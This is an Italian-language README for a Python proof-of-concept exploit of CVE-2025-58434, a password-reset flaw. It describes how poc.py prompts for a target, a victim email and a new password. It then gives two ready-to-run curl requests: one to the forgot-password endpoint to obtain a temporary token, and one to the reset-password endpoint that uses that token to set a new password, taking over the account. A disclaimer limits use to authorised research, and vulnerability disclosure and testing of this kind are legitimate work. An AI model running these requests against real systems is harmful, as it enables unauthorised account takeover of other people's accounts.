
CVE-2025-58434 Prova di concetto
Script proof-of-concept in Python per attivare POST /api/v1/account/forgot-password.
⚠️ Solo per scopi didattici e ricerca di sicurezza autorizzata. Eseguire questo strumento contro sistemi che non possiedi o per cui non disponi di autorizzazione scritta al test è illegale.
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434poc.py: chiede URL/IP della macchina, protocollo opzionale quando si usa un host/IP senza protocollo, email di destinazione e password; poi invia la richiesta e stampa stato HTTP, header e corpo della risposta in modo simile a curl -iEsegui:
python3 poc.py
Quindi fornisci:
10.10.11.10, http://10.10.11.10 o https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'